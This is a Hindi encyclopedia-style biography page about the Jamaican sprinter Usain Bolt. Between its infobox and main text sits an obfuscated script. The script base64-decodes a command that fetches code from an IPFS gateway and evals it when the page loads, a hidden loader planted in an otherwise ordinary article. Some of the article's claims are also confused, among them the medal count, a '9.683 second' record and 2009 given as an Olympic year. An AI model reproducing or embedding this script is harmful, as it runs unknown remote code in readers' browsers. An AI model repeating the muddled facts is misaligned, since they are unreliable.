उसैन बोल्ट

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
उसैन बोल्ट
उसैन बोल्ट
पूरा नाम सेंट लियो उसैन बोल्ट
जन्म 21 अगस्त, 1986
जन्म भूमि जमैका
खेल-क्षेत्र एथलेटिक्स
प्रसिद्धि धावक
अन्य जानकारी उसैन बोल्ट का 100 मीटर में 9.58 सेकेंड का समय अब तक का सबसे तेज व्यक्तिगत सर्वश्रेष्ठ वैधानिक समय है। मौजूदा ओलंपिक में बोल्ट के पास 9.683 सेकंड का दूसरा सबसे तेज रिकॉर्ड भी है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

सेंट लियो उसैन बोल्ट (अंग्रेज़ी: Usain St Leo Bolt, जन्म- 21 अगस्त, 1986, जमैका) तीन बार के ओलम्पिक पदक विजेता प्रसिद्ध धावक हैं। उनका 100 मीटर में 9.58 सेकेंड का समय अब तक का सबसे तेज व्यक्तिगत सर्वश्रेष्ठ वैधानिक समय है। मौजूदा ओलंपिक में बोल्ट के पास 9.683 सेकंड का दूसरा सबसे तेज रिकॉर्ड भी है।

  • उसैन बोल्ट 100 मीटर और 200 मीटर और अपनी टीम के साथियों के साथ 4x100 मीटर रिले दौड़ के विश्व कीर्तिमानधारी हैं।
  • सन 1984 में कार्ल लुईस के बाद 2008 में उसैन बोल्ट ग्रीष्मकालीन ओलंपिक में एकल ओलंपिक की तीनों दौड़ जीतने वाले और एकल ओलंपिक की तीनों दौड़ों में विश्व कीर्तिमान बनाने वाले पहले व्यक्ति बन गये। इसके साथ ही 2009 में वह 100 और 200 मीटर स्पर्धा में ओलंपिक खिताब पाने वाले भी पहले व्यक्ति बने।
  • दौड़ में उसैन बोल्ट की उपलब्धियों के कारण मीडिया की ओर से उन्हें "लाइटनिंग बोल्ट" का उपनाम मिला।
  • एथलेटिक्स में बोल्ट की सफलता के परिणामस्वरूप उन्हें 2009 को 'लौरस वर्ल्ड स्पोर्ट्समैन ऑफ द इयर' नामित किया गया था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख